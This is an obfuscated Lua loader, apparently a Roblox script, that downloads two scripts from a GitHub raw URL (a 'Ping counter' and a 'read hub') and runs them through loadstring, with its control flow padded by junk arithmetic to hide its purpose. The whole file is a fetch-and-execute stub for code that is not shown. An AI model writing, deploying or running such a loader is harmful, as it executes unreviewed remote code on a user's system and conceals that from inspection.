--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.9) ~  Much Love, Ferib 

]]--

local v0="https://raw.githubusercontent.com/RedfireFc/Content-lol/refs/heads/main/Ping%20counter";local v1="https://raw.githubusercontent.com/RedfireFc/Content-lol/refs/heads/main/read%20hub.txt";local function v2(v3) local v4=0 + 0 ;local v5;local v6;local v7;local v8;while true do if (1==v4) then v7,v8=loadstring(v6);if  not v7 then local v11=0 + 0 ;while true do if (v11==(877 -(282 + 595))) then warn("loadstring failed",v3,v8);return;end end end v4=1639 -(1523 + 114) ;end if (v4==(0 + 0)) then v5,v6=pcall(game.HttpGet,game,v3);if  not v5 then local v12=0 -0 ;while true do if (v12==(1065 -(68 + 997))) then warn("HTTP failed",v3);return;end end end v4=1271 -(226 + 1044) ;end if (v4==(8 -6)) then task.spawn(function() local v9,v10=pcall(v7);if  not v9 then warn("script errored",v10);end end);break;end end end v2(v0);v2(v1);
